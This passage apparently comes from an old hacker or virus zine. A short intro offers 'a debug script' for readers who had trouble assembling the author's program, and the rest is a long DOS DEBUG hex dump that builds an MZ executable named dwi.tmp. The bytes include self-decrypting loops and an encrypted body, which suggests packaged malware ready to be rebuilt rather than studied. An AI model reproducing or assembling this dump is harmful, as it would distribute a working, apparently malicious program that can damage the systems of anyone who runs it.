        Oh,  yea,  and, a debug script  for all  you guys  who, like me, had
 problems assembling this mis-mash of garbage...
db 4D 5A CE 01 05 00 00 00 02 00 E7 0F E7 0F 4A 00
db F2 06 56 31 00 01 4A 00 1C 00 00 00 00 00 00 00
db BE 30 01 8B FE B9 B1 02 AD 33 06 2E 01 AB E2 F8
db B4 0F CD 10 B4 00 CD 10 B8 03 13 B9 30 02 33 D2
db BD 30 01 CD 10 B4 09 BA 90 05 CD 21 CD 20 3E 2F
db 1E 20 1E 20 1E 20 E2 25 1E 25 1E 25 1E 25 E2 25
db 1E 25 E2 25 E2 25 E2 25 1E 25 E2 25 E2 25 E2 25
db 1E 25 1E 25 E2 25 1E 25 1E 25 E2 25 1E 25 E2 25
db 1E 25 1E 25 1E 25 1E 25 E2 25 E2 25 1E 25 E2 25
db 1E 25 1E 25 E2 25 1E 25 E2 25 E2 25 E2 25 1E 25
db 1E 25 1E 25 1E 25 E2 25 E2 25 E2 25 E2 25 1E 25
db E2 25 E2 25 E2 25 1E 25 1E 25 1E 25 E2 25 1E 25
db 1E 25 1E 25 E2 25 E2 25 1E 25 1E 25 E2 25 E2 25
db 1E 25 E2 25 E2 25 E2 25 1E 25 E2 25 E2 25 E2 25
db 1E 25 E2 25 E2 25 E2 25 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 1E 25
db E5 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 E5 25
db 1E 25 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25
db E5 25 E2 25 E5 25 1E 25 1E 25 E5 25 1E 25 1E 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E1 25 1E 25
db E5 25 1E 25 1E 25 E5 25 1E 25 E5 25 1E 25 E5 25
db 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25 1E 25 1E 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25 1E 25
db 1E 25 1E 25 E5 25 1E 20 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 E2 25 E1 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 E5 25
db 1E 25 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25
db 1E 25 E1 25 E5 25 1E 25 1E 25 E5 25 1E 25 1E 25
db 1E 25 1E 25 E5 25 1E 20 1E 20 1E 20 1E 20 1E 20
db E5 25 E2 25 E1 25 1E 25 E2 25 E1 25 1E 25 E5 25
db 1E 25 E5 25 E1 25 E1 25 1E 25 E5 25 E1 25 E1 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25 1E 25
db 1E 25 1E 25 E5 25 1E 20 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 E5 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 E5 25
db 1E 25 1E 25 1E 25 E5 25 E1 25 1E 25 1E 25 E5 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 1E 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E2 25 E2 25 1E 25
db E5 25 1E 25 E5 25 1E 25 E5 25 E2 25 E2 25 E5 25
db 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25 1E 25 1E 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25 1E 25
db 1E 25 1E 25 E5 25 1E 20 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 25 1E 25 1E 25 E5 25 1E 25 E2 25 E1 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 E5 25
db 1E 25 1E 25 E1 25 E2 25 1E 25 E5 25 1E 25 E5 25
db 1E 25 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 1E 25
db 1E 25 1E 25 E1 25 E2 25 1E 25 E2 25 E1 25 1E 25
db E5 25 1E 25 E5 25 1E 25 E5 25 1E 25 1E 25 E5 25
db 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25 1E 25 1E 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25 1E 25
db 1E 25 1E 25 E5 25 1E 20 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 25 1E 25 1E 25 1E 25 E1 25 1E 25 1E 25
db 1E 25 E1 25 E1 25 E1 25 1E 25 E1 25 1E 25 E1 25
db 1E 25 1E 25 1E 25 1E 25 E1 25 E1 25 1E 25 E1 25
db E1 25 E1 25 1E 25 1E 25 E1 25 E1 25 1E 25 E1 25
db 1E 25 1E 25 E1 25 1E 25 1E 25 E1 25 1E 20 1E 20
db 1E 20 1E 20 1E 20 1E 20 E1 25 1E 25 1E 25 1E 25
db E1 25 1E 25 E1 25 1E 25 E1 25 1E 25 1E 25 E1 25
db 1E 25 E1 25 1E 25 1E 25 1E 25 E1 25 1E 25 1E 25
db 1E 25 E1 25 E1 25 E1 25 1E 25 1E 25 E1 25 1E 25
db 1E 25 E1 25 E1 25 E1 25 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20
db 68 20 57 20 4C 20 4B 20 4D 20 1E 20 6E 20 4C 20
db 51 20 5A 20 4B 20 5D 20 4A 20 57 20 51 20 50 20
db 1E 20 71 20 4C 20 59 20 5F 20 50 20 57 20 44 20
db 5F 20 4A 20 57 20 51 20 50 20 12 20 1E 20 0C 21
db 0F 21 08 21 11 26 0B 21 0F 21 0D 21 11 26 07 21
db 0F 21 0A 21 11 26 08 21 0E 21 0C 21 11 26 09 21
db 0E 21 0D 21 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20
db 33 25 1E 0F 1E 60 50 4C 5B 0F 5F 48 5F 46 50 03
db 1E 58 5B 0F 49 46 4D 47 1E 5B 51 0F 4A 47 5F 41
db 55 0F 47 40 4B 0F 58 40 4C 0F 47 40 4B 5D 1E 4C
db 56 40 57 4C 5B 0F 51 49 1E 49 57 41 5B 03 1E 5E
db 4B 4E 52 46 4A 56 1E 59 57 5D 4B 5C 33 25 4E 5D
db 51 48 4C 4E 53 42 57 41 59 01 1E 78 5B 0F 5F 5B
db 1E 79 57 5D 4B 43 5B 41 4A 0F 79 5D 5F 49 58 46
db 4A 46 1E 47 5F 59 5B 0F 53 4E 5A 4A 1E 4E 52 43
db 1E 5F 51 5C 4D 46 5C 43 5B 0F 5B 49 58 40 4C 5B
db 4D 0F 4A 40 1E 5C 5B 4A 33 25 4A 47 5F 5B 1E 0F
db 51 5A 4C 0F 5D 40 5A 4A 1E 0F 57 5C 1E 40 58 0F
db 1E 5B 56 4A 1E 4D 5B 5C 4A 0F 4F 5A 5F 43 57 5B
db 47 01 1E 78 5B 0F 1E 58 57 5C 56 0F 47 40 4B 0F
db 52 5A 5D 44 1E 40 50 0F 47 40 4B 5D 1E 5B 5F 5C
db 55 0F 51 49 33 25 52 4A 5F 5D 50 46 50 48 1E 17
db 0E 57 06 19 1E 4E 4D 5C 5B 42 5C 43 47 01 33 25
db 33 25 24 00 00 00 00 00 00 0A 00 01 00 0C 00 01
db BB 13 01 B9 04 02 BA 1F 16 2E 31 17 2E D1 0F 43
db 43 E2 F6 23 1A 03 0A 21 18 6E 8D 48 8D 5D 6C CD
db C4 F5 4A 11 28 06 97 15 36 1E 00 8F 4B 19 1A 85
db 14 EB 4B 09 5B 81 14 02 B7 E9 4B 09 2B 89 14 18
db A4 B9 4A 09 2B 8D 14 B8 80 1F 14 FE E9 FE E9 E2
db E9 78 96 02 A7 97 2B 17 17 42 04 22 BA 1C 04 22
db 96 1F 4A 07 1B AF 15 07 1B 9B 17 03 0A 11 28 6F
db 17 AE 8C 5D B6 69 13 1E 66 1D A6 85 55 69 B7 1E
db 7E 8E 8C 5D B6 45 36 1E 0A 9E 69 1F 14 08 F9 6D
db 21 16 F0 57 71 8D B5 20 E2 91 1B 17 17 6D 15 58
db 1B 1E E0 AF 4C 1D 16 02 97 52 98 13 14 1F 06 1E
db 66 1D A6 A8 8C 5C C4 CA E8 BF B0 BD B2 B3 B8 B5
db 1A 23 6C 84 41 F7 5C 65 16 89 FE 4D 28 11 AC A1
db AA AB A4 A9 A6 CA 2B 3F 3A 1D 70 9E 0B AF 4B 97
db 1B 29 1C 58 37 1E 0E 12 32 1E C0 DE 01 C6 99 93
db 36 CD C4 C9 A3 78 96 02 A7 97 1B 3F 17 42 50 29
db 1C 42 0E 13 2C 14 98 12 36 1E BE 16 0E 02 32 1F
db 18 12 00 EB 0B 20 6A 7D 11 B3 AA B2 4E 6C 17 1E
db F2 43 FF 19 AA C9 73 7D 19 46 4B F4 CC DA E3 A3
db 1A 20 66 1B 6C 85 77 39 0B 20 7E 9E 64 2B 14 6A
db 65 18 8C 7E 7E 62 8C 7E 7E 0C 62 69 11 85 77 21
db 18 A5 A8 A3 A2 AD A0 AE 88 13 28 08 F3 03 18 61
db 65 14 4E 4B 03 9F FD EB 0B 21 70 9E C7 CF 12 0D
db 0B 65 1D 6F 17 64 8C 7F F2 78 30 6F 17 B0 8C 7E
db 04 02 60 14 04 32 64 14 7E 60 64 2B 16 6B 29 14
db 8C 7E C6 8B 12 BB B6 77 6B 85 77 1D 6B 21 1C 85
db A2 F5 06 1D 6B 7D 1C B3 74 F5 1C AB A2 CD 43 E0
db 77 1D 70 8C C7 5F 12 FA F2 03 18 63 71 14 68 8D
db 14 54 5D 18 CB 0A 5C 55 A7 AB B6 BB 1C 29 1E 18
db B3 1E 64 1F 12 F0 F5 08 B2 F7 14 9E 50 59 1C 0D
db 3B 5D 1C 5D 45 15 1C 9D 16 59 45 14 50 49 1C AB
db A6 7D 1F 09 2B 51 1C B8 D1 48 90 18 A3 1E 64 3F
db 16 F0 F5 08 B2 F7 10 48 82 9F B4 45 36 1E 98 13
db 70 15 16 1C 50 75 1C 59 4D 14 98 13 48 14 F2 12
db 98 13 74 15 BA 7C 66 1B 6C 6B 65 14 8C 7E 30 77
db 97 6D 23 1E 62 21 1C 85 77 CE 51 1D A4 18 E5 3F
db FE 16 7E 9E 8C 7E 7E 46 8C 5C 04 33 18 1C 6A CF
db 1F 60 69 14 64 79 16 F8 5F CF D1 1A 66 1D B8 09
db 0B 69 1D 09 3B 6D 1D 85 77 77 6B 85 77 7F 15 09
db 0B 65 1D CF D5 1C C4 DC EA 1F A0 97 B8 8D AC 5F
db 94 D9 D0 F5 B6 F5 CA C9 48 B7 C6 D5 56 9D FE F7
db C4 F7 FC D7 DC 5F 94 D7 C2 F5 F0 F7 DC FB 16 B3
db C4 FB FC C7 DC C3 FE 5F 98 FB D4 D3 DA CD FE CD
db 16 B1 84 83 4A 99 88 85 16 85 57 05 02 AD C8 F5
db 58 F3 DC 5F D2 D5 DC C3 56 D9 D4 F5 D8 CF FE 47
db 56 ED C8 F5 56 97 B8 8D 54 5F A4 C1 FC 51 F2 D5
db 56 C3 C8 F7 C6 CD CA D1 56 DB FC F7 56 DD 56 97
db D4 C5 CA 5F 56 B1 C4 C3 DE C1 F8 F9 56 5F 84 D7
db C4 C1 FE 5D 0C 0B B8 D5 CE C7 4E 5F F8 D5 56 DD
db FE 5F BA CD F2 F5 CE D5 CA F7 56 91 F2 DD DA D3
db C4 F7 C4 5F C6 DD FA D5 56 5F C6 DD DE 5F C4 F7
db 4A 43 4A 5F 56 ED C8 F5 58 FB DC 5F 56 C3 C8 F7
db 56 D1 C8 CD CA D1 56 5F FE C1 56 DB DC 05 02 FB
db FC C3 CA CD CA D1 56 F7 C6 DD FE 5F D2 F5 CE C7
db F0 CF C4 F7 56 D3 C8 FB 56 DD 56 F1 C6 CD CE D5
db 4E 5F 58 D9 FC EB 4E 5F C6 D5 E4 47 56 D3 F2 CD
db DC C3 DE F9 56 D7 C8 C3 58 F7 56 C7 DC F7 56 D3
db F2 CD DC C3 DE F9 0C 0B FC F9 DC 5F B8 CD CA D7
db C8 F1 F0 5D 56 5F 46 DD CA D7 56 ED C8 F5 58 FB
db DC 5F DE DD CC C3 56 FB C4 D1 C6 F7 56 F1 DC 51
db F2 D5 56 ED C8 F5 F2 5F DA FB C4 D5 CA D7 F0 5D
db 44 05 02 56 76 18 88 77 91 6B 65 14 8C 7E 90 6F
db 13 9B 70 8C 25 85 77 99 B1 69 31 1C 64 17 12 09
db 3B 11 14 BD 19 7D 38 99 90 DA E7 A8 7E 9E 64 29
db 1E 6B 17 1C 8C 7F B0 69 31 1C 64 17 12 09 3B 11
db 14 7D 38 BD 09 99 90 DA E7 A8 90 75 22 E3 0A 93
db 8B 4F 08 93 3B 4F 08 75 16 8B 5F 02 93 8B 5F 02
db EB B6 3D 06 00 75 06 3B C3 8B CC EB 05 3B C3 B9

n dwi.tmp